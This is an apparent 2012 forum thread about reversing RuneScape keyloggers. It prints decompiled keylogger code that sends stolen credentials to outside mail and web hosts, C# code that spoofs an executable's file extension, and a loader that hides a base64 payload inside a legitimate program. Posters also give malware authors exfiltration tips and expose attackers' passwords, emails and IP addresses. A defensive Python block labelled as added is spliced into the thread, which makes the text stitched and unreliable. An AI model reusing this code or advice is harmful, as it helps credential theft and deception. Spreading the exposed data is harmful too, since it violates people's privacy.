[QUOTE=supersnail11;34945802]Have you ever tried decompiling a C++ application? Visual Basic/C# are not raw executables, they are stored in a way that allows them to be decompiled to comprehensible code. Even if you could do the same to C++, the code that comes out of it would be so incomprehensible that it would be useless. The compiler doesn't compile the C++, it converts it to Assembly and compiles that. Which means it is MUCH, MUCH harder to decompile a C++ application.[/QUOTE]
Provided that you know what you are doing and have a decent grasp of Assembly it isn't hard, especially if the virus is made by someone that assumes no one is going to bother reversing it just because it was made in C++.
And Darwin is right, any decent debugger or disassembler will have the ability to check the string references.
Ok, let's pretend that we had a sample that was like some of the VB.Net ones.
DES Encryption on the password.
So on .Net we can just scan out and match the byte code in the program.
However, if it was made in C++ and we looked into it we would be left with a bunch of [URL="http://en.wikipedia.org/wiki/X86_instruction_listings"]op codes[/URL]. Now you have to follow the program through the decryption sequence to get the real password. You could scan for strings, but you would only get the encrypted string. If the attacker is smart (which has been done in some of the programs I have found) they make the keys up using a low-tech function, so in a C++ scenario you can't just look for the key. You would have to step through the code to get the key; you might as well step through enough to get the end result (the password).
I also thought of a 2nd way of doing it, which would be to intercept the SSL traffic using a fake cert; easier too.
Please correct me if I'm wrong in any of my points.
[editline]1st March 2012[/editline]
[IMG]http://www.benjojo.co.uk/fp/Screenshot-2012-03-01_19.51.16.png[/IMG]
:v:
You could be smart and use a .net packer that's made in c++
How do you guys deal with obfuscation? I can't work this code out as all the functions and stuff are named c2ddc7fe33bcaf89d2a87344192d0ab10() etc
[QUOTE=AMD 32;34947227]How do you guys deal with obfuscation? I can't work this code out as all the functions and stuff are named c2ddc7fe33bcaf89d2a87344192d0ab10() etc[/QUOTE]
Find And replace?
[QUOTE=AMD 32;34947227]How do you guys deal with obfuscation? I can't work this code out as all the functions and stuff are named c2ddc7fe33bcaf89d2a87344192d0ab10() etc[/QUOTE]
It depends on what kind of obfuscation it is. If it's just renaming, Simple Assembly Explorer's default deobfuscator. If it's more complex I use de4dotnet.
[QUOTE=marvincmarvin;34947283]It depends on what kind of obfuscation it is. If it's just renaming, simple assembly explorer's default deobfuscator. If it's more complex I use de4dotnet.[/QUOTE]
Or do it the real man's way and just work around it.
[QUOTE=supersnail11;34947375]Or do it the real man's way and just work around it.[/QUOTE]
Or the real real man's way; notepad.
[QUOTE=AMD 32;34947227]How do you guys deal with obfuscation? I can't work this code out as all the functions and stuff are named c2ddc7fe33bcaf89d2a87344192d0ab10() etc[/QUOTE]
Use [url=https://github.com/0xd4d/de4dot]de4dot[/url]. ([url=https://github.com/downloads/0xd4d/de4dot/de4dot-1.6.1.zip]Binaries[/url])
client.set_Credentials(new NetworkCredential("Zamcrack3r@hotmail.com", "bandos"));
Well that was easy..
Completely forgot Gmail logs IPs. Need to start recording these people's IPs. For shits and giggles, next US/Can virus I come across I am going to try contacting their ISP to see where it goes.
[url]http://www.youtube.com/watch?v=MnjLRMXGbcE[/url]
[email]obotovo@gmail.com[/email]:-snip-
[email]psp.private.bremen@hotmail.de[/email]
Germany (91.58.234.109) 10:49 (6 hours ago), March 1, 2012
I found a very interesting key-logger.
First, an EXE inside of an EXE that's inside of an EXE.
Then I found this.
[CODE]http://1648795134.1x.biz/secure.runescape.com/m=weblogin/g=runescape/secure.runescape.com/m=weblogin/www.jagex.com/ajax.googleapis.com/m=weblogin/post3.php?username1=" + this.TextBox1.Text + "&password1=" + this.TextBox2.Text[/CODE]
I ran the biz through ping,
[IMG]http://puu.sh/j3CE[/IMG]
And Google'd the ip,
[IMG]http://puu.sh/j3Di[/IMG]
And the ip leads here,
[IMG]http://puu.sh/j3Hv[/IMG]
Ain't that interesting.
I just came across someone who used the sneaky Windows file extension bug by using some Arabic character in the file name. Said file was called *.exe.doc, but upon downloading it actually changed to *.-cod.exe.
Some people are crafty.
[QUOTE=Phreebird;34949446] ... [/QUOTE]
Sounds like they used a crypter on a file twice.
[QUOTE=Shad0wZ;34949550] ... [/QUOTE]
That's actually a very popular public method on some malware programming forums.
You don't see it used often by YouTube spreaders though.
The operation seems a little advanced for Runescape key-logging.
It's not advanced at all.
[csharp]
using System;
using System.IO;

public static string SpoofFileExtension(string fileName, string extension) {
    char[] extensionCharArray = extension.ToCharArray(); // Insert the fake extension into an array
    Array.Reverse(extensionCharArray); // Reverse the array (Array.Reverse takes the array itself, not a ref)
    string newFileName = fileName.Substring(0, fileName.Length - 4); // Get the filename w/out the (4-char) extension
    newFileName += ((char)8238) + new string(extensionCharArray) + fileName.Substring(fileName.Length - 4); // Add U+202E RIGHT-TO-LEFT OVERRIDE, then the reversed fake extension, and finally the original extension
    File.Move(fileName, newFileName); // Super advanced renaming technique
    return newFileName;
}
[/csharp]
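A defender-side check for the trick above, added here as an example and not code from the thread: the "Arabic character" is really U+202E RIGHT-TO-LEFT OVERRIDE, so the function reconstructs what a file manager would display, compares that apparent extension with the one the OS actually uses, and flags any bidi control character in a name. The sample filenames are constructed.

```python
# Added example (not from the thread): spot filenames that use Unicode bidi
# override characters to disguise an executable's real extension.
import os
import unicodedata

# Bidi embedding/override/isolate controls U+202A..U+202E and U+2066..U+2069.
# None of them belong in a filename; U+202E (RLO) is the one used in the thread.
BIDI_CONTROLS = {chr(c) for c in range(0x202A, 0x202F)} | {chr(c) for c in range(0x2066, 0x206A)}
RLO, PDF = "\u202e", "\u202c"


def displayed_name(name: str) -> str:
    """Approximate what a file manager draws: everything after an RLO is
    rendered right-to-left (reversed) until a PDF pops the override."""
    if RLO not in name:
        return "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    head, tail = name.split(RLO, 1)
    reversed_part, _, rest = tail.partition(PDF)
    return head + reversed_part[::-1] + rest


def analyze_filename(name: str) -> dict:
    """Compare the extension the user sees with the one the OS will act on."""
    controls = sorted(
        f"U+{ord(ch):04X} {unicodedata.name(ch, 'UNKNOWN')}" for ch in set(name) if ch in BIDI_CONTROLS
    )
    shown = displayed_name(name)
    real_ext = os.path.splitext(name)[1].lower()
    shown_ext = os.path.splitext(shown)[1].lower()
    return {
        "shown_as": shown,
        "shown_ext": shown_ext,
        "real_ext": real_ext,
        "bidi_controls": controls,
        "suspicious": bool(controls) or real_ext != shown_ext,
    }


def flag_suspicious(names):
    """Return only the names a mail gateway or download scanner should quarantine."""
    return [n for n in names if analyze_filename(n)["suspicious"]]


if __name__ == "__main__":
    # Constructed samples: the first mimics the thread's "*.exe.doc" that is really "*.-cod.exe".
    samples = ["Invoice\u202ecod.exe", "report.doc", "photo.jpg"]
    for n in samples:
        info = analyze_filename(n)
        print(f"{n!r}: shown as {info['shown_as']!r}, real {info['real_ext']}, suspicious={info['suspicious']}")
```

Because "exe" reads the same backwards, the reversed tail "cod.exe" is displayed as "exe.doc", which is exactly the mismatch the check reports.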
It amazes me how much personal information people will put on an account they put in a keylogger.
[url]http://www.youtube.com/watch?v=fPJfS62nJPY[/url]
[email]mattyberry9@gmail.com[/email]:runescape12345 (changed)
[email]matty_berry9@hotmail.co.uk[/email]
<name>
<phone>
United Kingdom (81.97.17.17) 18:23 (1 minute ago), March 1, 2012
[code]private void Button1_Click(object sender, EventArgs e)
{
if (this.TextBox1.get_Text() == "")
{
Interaction.MsgBox("Username Is Missing", 0, null);
if (this.TextBox2.get_Text() == "")
{
Interaction.MsgBox("Password Is Mising", 0, null);
}
}
SmtpClient client = new SmtpClient();
MailMessage message = new MailMessage();
client.set_Credentials(new NetworkCredential("jonaspowarr@gmail.com", "jonasjonas"));
client.set_Port(0x24b);
client.set_Host("smtp.gmail.com");
client.set_EnableSsl(true);
message = new MailMessage();
message.set_From(new MailAddress("jonaspowarr@gmail.com"));
message.get_To().Add("jonaspowarr@gmail.com");
message.set_Subject("Runescape Login door Membership Hack V7: ");
message.set_Body("Gebruikersnaam : " + this.TextBox1.get_Text() + " en het wachtwoord is : " + this.TextBox2.get_Text() + " en die wou het membership : " + this.ComboBox1.get_Text() + ", maar helaas. xD ");
client.Send(message);
Interaction.MsgBox("Membership Succesfully, delivery within 2 days", 0, null);
}
[/code]
Nobody even tries to make it difficult in the ones I find (aside from the obfuscated one earlier)
[editline]2nd March 2012[/editline]
Also lol at people using their personal accounts instead of registering another e-mail for it
[editline]2nd March 2012[/editline]
[img]http://gyazo.com/4a9e313e4c56dc397b071ca81b819957.png?1330646558[/img]
Is this.. Braille?
I feel like I'm shooting myself in my foot when I write this, but oh well.
[url]http://blogcake.x10.mx/wordpress/2012/03/keyloggers-wrong/[/url]
I don't see why people don't use legitimate applications and add this to the entrypoint..
[csharp]
Assembly.Load(Convert.FromBase64String("[B64EncodedApplication]")).EntryPoint.Invoke(null, new object[] {});
[/csharp]
[QUOTE=AMD 32;34950559][img]http://gyazo.com/4a9e313e4c56dc397b071ca81b819957.png?1330646558[/img]
[/QUOTE]
What classes are in the "-" namespace? (other than <Module>)
OK guys quick ethical question. What if you were to:
Take the official project neptune
Add a line that sends every gmail username and password to an email when the keylogger is created
Release on youtube
Ethically fine Y/N
[QUOTE=supersnail11;34952584]OK guys quick ethical question. What if you were to:
Take the official project neptune
Add a line that sends every gmail username and password to an email when the keylogger is created
Release on youtube
Ethically fine Y/N[/QUOTE]
If the skids that use this shit can't put in the effort to even check that what they intend to use isn't malicious against themselves, they deserve to be punished.
The way I look at it, we'll be getting it from their keyloggers in the future anyways.
[QUOTE=Shad0wZ;34949550]I just came across someone who used the sneaky Windows file extension bug by using some Arabic character in the file name. Said file was called *.exe.doc, but upon downloading it actually changed to *.-cod.exe.
Some people are crafty.[/QUOTE]
That's awesome. I never thought of that before. Exe is a palindrome so encoding it right-to-left happens to work.
Can we have some word from the mods about how far we are allowed to go with posting details and or calling them.
[QUOTE=supersnail11]To make this much harder to do, if they wrote them in C++ or a language that doesn’t compile to bytecode but instead compiles directly to PE (.exe format)[/QUOTE]
The word you're looking for here is machine code, Visual Studio still produces PE files for .NET code.
[QUOTE=supersnail11]Basically, instead of using email to send your logs, you send them with a POST or GET request to a webpage on your server.[/QUOTE]
What about anonymity? What about hosting?
You get that for free with email.
[QUOTE=dajoh;34956057]What about anonymity? What about hosting?
You get that for free with email.[/QUOTE]
You can get anonymous hosting. It will just cost you quite a bit.
Really, people are just doing the email way wrong. A simple way to do it more securely is to register 2 accounts: 1 for sending emails and 1 for receiving. That way, even if you lose the sending one, you still have control of the receiver. Also, you could probably use a free service to dynamically update the sender when it's changed.
Basically use a forwarding email, not your personal gmail idiots
[QUOTE=high;34956121]That way even if you lose the sending one you still have control of the receiver.[/QUOTE]
Losing the sender account isn't acceptable.
[QUOTE=high;34956121]Also you could probably use a free service to dynamically update the sender when its changed.[/QUOTE]
Which will get lost too eventually.
What these morons who make these keyloggers don't understand is that you can send emails without having any credentials.